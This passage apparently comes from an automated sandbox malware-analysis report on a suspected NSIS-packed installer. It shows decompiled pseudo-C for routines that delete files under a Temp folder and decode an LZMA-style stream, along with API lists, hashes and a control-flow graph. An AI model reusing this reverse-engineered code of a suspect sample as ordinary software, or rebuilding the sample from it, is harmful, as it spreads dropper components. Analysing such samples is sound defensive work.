                                                					}
                                                					__eflags =  *0x425710 - 0x5c;
                                                					if( *0x425710 != 0x5c) {
                                                						goto L11;
                                                					}
                                                					goto L10;
                                                				} else {
                                                					__eflags = _t38;
                                                					if(_t38 == 0) {
                                                						L28:
                                                						__eflags = _a4;
                                                						if(_a4 == 0) {
                                                							L36:
                                                							return _t38;
                                                						}
                                                						__eflags = _v12;
                                                						if(_v12 != 0) {
                                                							_t38 = E0040683D(_t68);
                                                							__eflags = _t38;
                                                							if(_t38 == 0) {
                                                								goto L36;
                                                							}
                                                							E00405DD6(_t68);
                                                							_t38 = E00405BCB(__eflags, _t68, _v8 | 0x00000001);
                                                							__eflags = _t38;
                                                							if(_t38 != 0) {
                                                								return E00405569(0xffffffe5, _t68);
                                                							}
                                                							__eflags = _v8;
                                                							if(_v8 == 0) {
                                                								goto L30;
                                                							}
                                                							E00405569(0xfffffff1, _t68);
                                                							return E004062C7(_t67, _t68, 0);
                                                						}
                                                						L30:
                                                						 *0x42a2a8 =  *0x42a2a8 + 1;
                                                						return _t38;
                                                					}
                                                					__eflags = _t65 & 0x00000002;
                                                					if((_t65 & 0x00000002) == 0) {
                                                						goto L28;
                                                					}
                                                					goto L5;
                                                				}
                                                			}


















                                                0x00405c1d
                                                0x00405c22
                                                0x00405c2b
                                                0x00405c2e
                                                0x00405c36
                                                0x00405c39
                                                0x00405c3c
                                                0x00405c44
                                                0x00405c46
                                                0x00405c47
                                                0x00000000
                                                0x00405c47
                                                0x00405c52
                                                0x00405c55
                                                0x00405c55
                                                0x00405c55
                                                0x00405c59
                                                0x00405c6c
                                                0x00405c73
                                                0x00405c78
                                                0x00405c7c
                                                0x00405c8c
                                                0x00405c7e
                                                0x00405c84
                                                0x00405c84
                                                0x00405c91
                                                0x00405c95
                                                0x00405ca1
                                                0x00405ca7
                                                0x00405cac
                                                0x00405cb2
                                                0x00405cbd
                                                0x00405cc3
                                                0x00405cc5
                                                0x00405cc8
                                                0x00405d72
                                                0x00405d72
                                                0x00405d76
                                                0x00405d78
                                                0x00405d78
                                                0x00405d78
                                                0x00405d78
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405cce
                                                0x00405cce
                                                0x00405cce
                                                0x00405cd6
                                                0x00405cf6
                                                0x00405cfe
                                                0x00405d03
                                                0x00405d0a
                                                0x00405d25
                                                0x00405d2a
                                                0x00405d2c
                                                0x00405d50
                                                0x00405d2e
                                                0x00405d2e
                                                0x00405d31
                                                0x00405d45
                                                0x00405d33
                                                0x00405d36
                                                0x00405d3e
                                                0x00405d3e
                                                0x00405d31
                                                0x00405d0c
                                                0x00405d12
                                                0x00405d14
                                                0x00405d1a
                                                0x00405d1a
                                                0x00405d14
                                                0x00000000
                                                0x00405d0a
                                                0x00405cd8
                                                0x00405ce0
                                                0x00000000
                                                0x00000000
                                                0x00405ce2
                                                0x00405cea
                                                0x00000000
                                                0x00000000
                                                0x00405cec
                                                0x00405cf4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405d55
                                                0x00405d5d
                                                0x00405d63
                                                0x00405d63
                                                0x00405d6c
                                                0x00000000
                                                0x00405d6c
                                                0x00405c97
                                                0x00405c9f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405c5b
                                                0x00405c5b
                                                0x00405c5d
                                                0x00405d7d
                                                0x00405d7f
                                                0x00405d82
                                                0x00405dd3
                                                0x00405dd3
                                                0x00405dd3
                                                0x00405d84
                                                0x00405d87
                                                0x00405d92
                                                0x00405d97
                                                0x00405d99
                                                0x00000000
                                                0x00000000
                                                0x00405d9c
                                                0x00405da8
                                                0x00405dad
                                                0x00405daf
                                                0x00000000
                                                0x00405dca
                                                0x00405db1
                                                0x00405db4
                                                0x00000000
                                                0x00000000
                                                0x00405db9
                                                0x00000000
                                                0x00405dc0
                                                0x00405d89
                                                0x00405d89
                                                0x00000000
                                                0x00405d89
                                                0x00405c63
                                                0x00405c66
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405c66

                                                APIs
                                                • DeleteFileW.KERNELBASE(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C3C
                                                • lstrcatW.KERNEL32(Undervisningssektionernes\Zoophorous.Atl,\*.*), ref: 00405C84
                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405CA7
                                                • lstrlenW.KERNEL32(?,?,0040A014,?,Undervisningssektionernes\Zoophorous.Atl,?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CAD
                                                • FindFirstFileW.KERNELBASE(Undervisningssektionernes\Zoophorous.Atl,?,?,?,0040A014,?,Undervisningssektionernes\Zoophorous.Atl,?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBD
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
                                                • FindClose.KERNEL32(00000000), ref: 00405D6C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: .$.$C:\Users\user\AppData\Local\Temp\$Undervisningssektionernes\Zoophorous.Atl$\*.*
                                                • API String ID: 2035342205-1831998615
                                                • Opcode ID: 62f7cfa9fff3930ae21cb656bb45e977fea218a9361954a66eba92a673b55763
                                                • Instruction ID: 7f21bfa76759dd048c017f5e8d67b30635c21f713a141b53f9c1cb2b61cba077
                                                • Opcode Fuzzy Hash: 62f7cfa9fff3930ae21cb656bb45e977fea218a9361954a66eba92a673b55763
                                                • Instruction Fuzzy Hash: BD419F30400A15BADB21AB619C8DAAF7B78EF41718F14817BF801721D1D77C4A82DEAE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 783 406bfe-406c03 784 406c74-406c92 783->784 785 406c05-406c34 783->785 786 40726a-40727f 784->786 787 406c36-406c39 785->787 788 406c3b-406c3f 785->788 790 407281-407297 786->790 791 407299-4072af 786->791 789 406c4b-406c4e 787->789 792 406c41-406c45 788->792 793 406c47 788->793 795 406c50-406c59 789->795 796 406c6c-406c6f 789->796 794 4072b2-4072b9 790->794 791->794 792->789 793->789 797 4072e0-4072ec 794->797 798 4072bb-4072bf 794->798 799 406c5b 795->799 800 406c5e-406c6a 795->800 801 406e41-406e5f 796->801 809 406a82-406a8b 797->809 802 4072c5-4072dd 798->802 803 40746e-407478 798->803 799->800 805 406cd4-406d02 800->805 806 406e61-406e75 801->806 807 406e77-406e89 801->807 802->797 810 407484-407497 803->810 811 406d04-406d1c 805->811 812 406d1e-406d38 805->812 808 406e8c-406e96 806->808 807->808 813 406e98 808->813 814 406e39-406e3f 808->814 815 406a91 809->815 816 407499 809->816 817 40749c-4074a0 810->817 818 406d3b-406d45 811->818 812->818 819 406e14-406e18 813->819 820 406fa9-406fb6 813->820 814->801 825 406ddd-406de7 814->825 821 406a98-406a9c 815->821 822 406bd8-406bf9 815->822 823 406b3d-406b41 815->823 824 406bad-406bb1 815->824 816->817 826 406d4b 818->826 827 406cbc-406cc2 818->827 838 407420-40742a 819->838 839 406e1e-406e36 819->839 820->809 821->810 831 406aa2-406aaf 821->831 822->786 829 406b47-406b60 823->829 830 4073ed-4073f7 823->830 836 406bb7-406bcb 824->836 837 4073fc-407406 824->837 832 40742c-407436 825->832 833 406ded-406e0f 825->833 843 406ca1-406cb9 826->843 844 407408-407412 826->844 834 406d75-406d7b 827->834 835 406cc8-406cce 827->835 842 406b63-406b67 829->842 830->810 831->816 845 406ab5-406afb 831->845 832->810 833->820 840 406dd9 834->840 841 406d7d-406d9b 834->841 835->805 835->840 846 406bce-406bd6 836->846 837->810 838->810 839->814 840->825 847 406db3-406dc5 841->847 848 406d9d-406db1 841->848 842->823 849 406b69-406b6f 842->849 843->827 844->810 850 406b23-406b25 845->850 851 406afd-406b01 845->851 846->822 846->824 854 406dc8-406dd2 847->854 848->854 855 406b71-406b78 849->855 856 406b99-406bab 849->856 852 406b33-406b3b 850->852 853 406b27-406b31 850->853 857 406b03-406b06 GlobalFree 851->857 858 406b0c-406b1a GlobalAlloc 851->858 852->842 853->852 853->853 854->834 859 406dd4 854->859 860 406b83-406b93 GlobalAlloc 855->860 861 406b7a-406b7d GlobalFree 855->861 856->846 857->858 858->816 862 406b20 858->862 864 407414-40741e 859->864 865 406d5a-406d72 859->865 860->816 860->856 861->860 862->850 864->810 865->834
                                                C-Code - Quality: 98%
                                                			E00406BFE() {
                                                				unsigned short _t531;
                                                				signed int _t532;
                                                				void _t533;
                                                				void* _t534;
                                                				signed int _t535;
                                                				signed int _t565;
                                                				signed int _t568;
                                                				signed int _t590;
                                                				signed int* _t607;
                                                				void* _t614;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					if( *(_t614 - 0x40) != 0) {
                                                						 *(_t614 - 0x34) = 1;
                                                						 *(_t614 - 0x84) = 7;
                                                						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                						L132:
                                                						 *(_t614 - 0x54) = _t607;
                                                						L133:
                                                						_t531 =  *_t607;
                                                						_t590 = _t531 & 0x0000ffff;
                                                						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                						if( *(_t614 - 0xc) >= _t565) {
                                                							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                							 *(_t614 - 0x40) = 1;
                                                							_t532 = _t531 - (_t531 >> 5);
                                                							 *_t607 = _t532;
                                                						} else {
                                                							 *(_t614 - 0x10) = _t565;
                                                							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                						}
                                                						if( *(_t614 - 0x10) >= 0x1000000) {
                                                							L139:
                                                							_t533 =  *(_t614 - 0x84);
                                                							L140:
                                                							 *(_t614 - 0x88) = _t533;
                                                							goto L1;
                                                						} else {
                                                							L137:
                                                							if( *(_t614 - 0x6c) == 0) {
                                                								 *(_t614 - 0x88) = 5;
                                                								goto L170;
                                                							}
                                                							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                							goto L139;
                                                						}
                                                					} else {
                                                						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                						__esi =  *(__ebp - 0x60);
                                                						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                						__ecx =  *(__ebp - 0x3c);
                                                						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                						__ecx =  *(__ebp - 4);
                                                						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                						if( *(__ebp - 0x38) >= 4) {
                                                							if( *(__ebp - 0x38) >= 0xa) {
                                                								_t97 = __ebp - 0x38;
                                                								 *_t97 =  *(__ebp - 0x38) - 6;
                                                							} else {
                                                								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                							}
                                                						} else {
                                                							 *(__ebp - 0x38) = 0;
                                                						}
                                                						if( *(__ebp - 0x34) == __edx) {
                                                							__ebx = 0;
                                                							__ebx = 1;
                                                							L60:
                                                							__eax =  *(__ebp - 0x58);
                                                							__edx = __ebx + __ebx;
                                                							__ecx =  *(__ebp - 0x10);
                                                							__esi = __edx + __eax;
                                                							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                							__ax =  *__esi;
                                                							 *(__ebp - 0x54) = __esi;
                                                							__edi = __ax & 0x0000ffff;
                                                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                							if( *(__ebp - 0xc) >= __ecx) {
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                								__cx = __ax;
                                                								_t216 = __edx + 1; // 0x1
                                                								__ebx = _t216;
                                                								__cx = __ax >> 5;
                                                								 *__esi = __ax;
                                                							} else {
                                                								 *(__ebp - 0x10) = __ecx;
                                                								0x800 = 0x800 - __edi;
                                                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                								__ebx = __ebx + __ebx;
                                                								 *__esi = __cx;
                                                							}
                                                							 *(__ebp - 0x44) = __ebx;
                                                							if( *(__ebp - 0x10) >= 0x1000000) {
                                                								L59:
                                                								if(__ebx >= 0x100) {
                                                									goto L54;
                                                								}
                                                								goto L60;
                                                							} else {
                                                								L57:
                                                								if( *(__ebp - 0x6c) == 0) {
                                                									 *(__ebp - 0x88) = 0xf;
                                                									goto L170;
                                                								}
                                                								__ecx =  *(__ebp - 0x70);
                                                								__eax =  *(__ebp - 0xc);
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                								_t202 = __ebp - 0x70;
                                                								 *_t202 =  *(__ebp - 0x70) + 1;
                                                								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                								goto L59;
                                                							}
                                                						} else {
                                                							__eax =  *(__ebp - 0x14);
                                                							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                							if(__eax >=  *(__ebp - 0x74)) {
                                                								__eax = __eax +  *(__ebp - 0x74);
                                                							}
                                                							__ecx =  *(__ebp - 8);
                                                							__ebx = 0;
                                                							__ebx = 1;
                                                							__al =  *((intOrPtr*)(__eax + __ecx));
                                                							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                							L40:
                                                							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                							__ecx =  *(__ebp - 0x58);
                                                							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                							 *(__ebp - 0x48) = __eax;
                                                							__eax = __eax + 1;
                                                							__eax = __eax << 8;
                                                							__eax = __eax + __ebx;
                                                							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                							__ax =  *__esi;
                                                							 *(__ebp - 0x54) = __esi;
                                                							__edx = __ax & 0x0000ffff;
                                                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                							if( *(__ebp - 0xc) >= __ecx) {
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                								__cx = __ax;
                                                								 *(__ebp - 0x40) = 1;
                                                								__cx = __ax >> 5;
                                                								__ebx = __ebx + __ebx + 1;
                                                								 *__esi = __ax;
                                                							} else {
                                                								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                								 *(__ebp - 0x10) = __ecx;
                                                								0x800 = 0x800 - __edx;
                                                								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                								__ebx = __ebx + __ebx;
                                                								 *__esi = __cx;
                                                							}
                                                							 *(__ebp - 0x44) = __ebx;
                                                							if( *(__ebp - 0x10) >= 0x1000000) {
                                                								L38:
                                                								__eax =  *(__ebp - 0x40);
                                                								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                									while(1) {
                                                										if(__ebx >= 0x100) {
                                                											break;
                                                										}
                                                										__eax =  *(__ebp - 0x58);
                                                										__edx = __ebx + __ebx;
                                                										__ecx =  *(__ebp - 0x10);
                                                										__esi = __edx + __eax;
                                                										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                										__ax =  *__esi;
                                                										 *(__ebp - 0x54) = __esi;
                                                										__edi = __ax & 0x0000ffff;
                                                										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                										if( *(__ebp - 0xc) >= __ecx) {
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                											__cx = __ax;
                                                											_t169 = __edx + 1; // 0x1
                                                											__ebx = _t169;
                                                											__cx = __ax >> 5;
                                                											 *__esi = __ax;
                                                										} else {
                                                											 *(__ebp - 0x10) = __ecx;
                                                											0x800 = 0x800 - __edi;
                                                											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                											__ebx = __ebx + __ebx;
                                                											 *__esi = __cx;
                                                										}
                                                										 *(__ebp - 0x44) = __ebx;
                                                										if( *(__ebp - 0x10) < 0x1000000) {
                                                											L45:
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xe;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t155 = __ebp - 0x70;
                                                											 *_t155 =  *(__ebp - 0x70) + 1;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                										}
                                                									}
                                                									L53:
                                                									_t172 = __ebp - 0x34;
                                                									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                									L54:
                                                									__al =  *(__ebp - 0x44);
                                                									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                									L55:
                                                									if( *(__ebp - 0x64) == 0) {
                                                										 *(__ebp - 0x88) = 0x1a;
                                                										goto L170;
                                                									}
                                                									__ecx =  *(__ebp - 0x68);
                                                									__al =  *(__ebp - 0x5c);
                                                									__edx =  *(__ebp - 8);
                                                									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                									 *( *(__ebp - 0x68)) = __al;
                                                									__ecx =  *(__ebp - 0x14);
                                                									 *(__ecx +  *(__ebp - 8)) = __al;
                                                									__eax = __ecx + 1;
                                                									__edx = 0;
                                                									_t191 = __eax %  *(__ebp - 0x74);
                                                									__eax = __eax /  *(__ebp - 0x74);
                                                									__edx = _t191;
                                                									L79:
                                                									 *(__ebp - 0x14) = __edx;
                                                									L80:
                                                									 *(__ebp - 0x88) = 2;
                                                									goto L1;
                                                								}
                                                								if(__ebx >= 0x100) {
                                                									goto L53;
                                                								}
                                                								goto L40;
                                                							} else {
                                                								L36:
                                                								if( *(__ebp - 0x6c) == 0) {
                                                									 *(__ebp - 0x88) = 0xd;
                                                									L170:
                                                									_t568 = 0x22;
                                                									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                									_t535 = 0;
                                                									L172:
                                                									return _t535;
                                                								}
                                                								__ecx =  *(__ebp - 0x70);
                                                								__eax =  *(__ebp - 0xc);
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                								_t121 = __ebp - 0x70;
                                                								 *_t121 =  *(__ebp - 0x70) + 1;
                                                								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                								goto L38;
                                                							}
                                                						}
                                                					}
                                                					L1:
                                                					_t534 =  *(_t614 - 0x88);
                                                					if(_t534 > 0x1c) {
                                                						L171:
                                                						_t535 = _t534 | 0xffffffff;
                                                						goto L172;
                                                					}
                                                					switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
                                                						case 0:
                                                							if( *(_t614 - 0x6c) == 0) {
                                                								goto L170;
                                                							}
                                                							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                							_t534 =  *( *(_t614 - 0x70));
                                                							if(_t534 > 0xe1) {
                                                								goto L171;
                                                							}
                                                							_t538 = _t534 & 0x000000ff;
                                                							_push(0x2d);
                                                							asm("cdq");
                                                							_pop(_t570);
                                                							_push(9);
                                                							_pop(_t571);
                                                							_t610 = _t538 / _t570;
                                                							_t540 = _t538 % _t570 & 0x000000ff;
                                                							asm("cdq");
                                                							_t605 = _t540 % _t571 & 0x000000ff;
                                                							 *(_t614 - 0x3c) = _t605;
                                                							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                								L10:
                                                								if(_t613 == 0) {
                                                									L12:
                                                									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                									goto L15;
                                                								} else {
                                                									goto L11;
                                                								}
                                                								do {
                                                									L11:
                                                									_t613 = _t613 - 1;
                                                									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                								} while (_t613 != 0);
                                                								goto L12;
                                                							}
                                                							if( *(_t614 - 4) != 0) {
                                                								GlobalFree( *(_t614 - 4)); // executed
                                                							}
                                                							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                							 *(_t614 - 4) = _t534;
                                                							if(_t534 == 0) {
                                                								goto L171;
                                                							} else {
                                                								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                								goto L10;
                                                							}
                                                						case 1:
                                                							L13:
                                                							__eflags =  *(_t614 - 0x6c);
                                                							if( *(_t614 - 0x6c) == 0) {
                                                								 *(_t614 - 0x88) = 1;
                                                								goto L170;
                                                							}
                                                							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                							_t45 = _t614 - 0x48;
                                                							 *_t45 =  *(_t614 - 0x48) + 1;
                                                							__eflags =  *_t45;
                                                							L15:
                                                							if( *(_t614 - 0x48) < 4) {
                                                								goto L13;
                                                							}
                                                							_t546 =  *(_t614 - 0x40);
                                                							if(_t546 ==  *(_t614 - 0x74)) {
                                                								L20:
                                                								 *(_t614 - 0x48) = 5;
                                                								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                								goto L23;
                                                							}
                                                							 *(_t614 - 0x74) = _t546;
                                                							if( *(_t614 - 8) != 0) {
                                                								GlobalFree( *(_t614 - 8)); // executed
                                                							}
                                                							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                							 *(_t614 - 8) = _t534;
                                                							if(_t534 == 0) {
                                                								goto L171;
                                                							} else {
                                                								goto L20;
                                                							}
                                                						case 2:
                                                							L24:
                                                							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                							 *(_t614 - 0x84) = 6;
                                                							 *(_t614 - 0x4c) = _t553;
                                                							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                							goto L132;
                                                						case 3:
                                                							L21:
                                                							__eflags =  *(_t614 - 0x6c);
                                                							if( *(_t614 - 0x6c) == 0) {
                                                								 *(_t614 - 0x88) = 3;
                                                								goto L170;
                                                							}
                                                							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                							_t67 = _t614 - 0x70;
                                                							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                							__eflags =  *_t67;
                                                							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                							L23:
                                                							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                							if( *(_t614 - 0x48) != 0) {
                                                								goto L21;
                                                							}
                                                							goto L24;
                                                						case 4:
                                                							goto L133;
                                                						case 5:
                                                							goto L137;
                                                						case 6:
                                                							goto L0;
                                                						case 7:
                                                							__eflags =  *(__ebp - 0x40) - 1;
                                                							if( *(__ebp - 0x40) != 1) {
                                                								__eax =  *(__ebp - 0x24);
                                                								 *(__ebp - 0x80) = 0x16;
                                                								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                								__eax =  *(__ebp - 0x28);
                                                								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                								__eax =  *(__ebp - 0x2c);
                                                								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                								__eax = 0;
                                                								__eflags =  *(__ebp - 0x38) - 7;
                                                								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                								__al = __al & 0x000000fd;
                                                								__eax = (__eflags >= 0) - 1 + 0xa;
                                                								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                								__eax =  *(__ebp - 4);
                                                								__eax =  *(__ebp - 4) + 0x664;
                                                								__eflags = __eax;
                                                								 *(__ebp - 0x58) = __eax;
                                                								goto L68;
                                                							}
                                                							__eax =  *(__ebp - 4);
                                                							__ecx =  *(__ebp - 0x38);
                                                							 *(__ebp - 0x84) = 8;
                                                							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                							goto L132;
                                                						case 8:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__eax =  *(__ebp - 4);
                                                								__ecx =  *(__ebp - 0x38);
                                                								 *(__ebp - 0x84) = 0xa;
                                                								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                							} else {
                                                								__eax =  *(__ebp - 0x38);
                                                								__ecx =  *(__ebp - 4);
                                                								__eax =  *(__ebp - 0x38) + 0xf;
                                                								 *(__ebp - 0x84) = 9;
                                                								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                							}
                                                							goto L132;
                                                						case 9:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								goto L89;
                                                							}
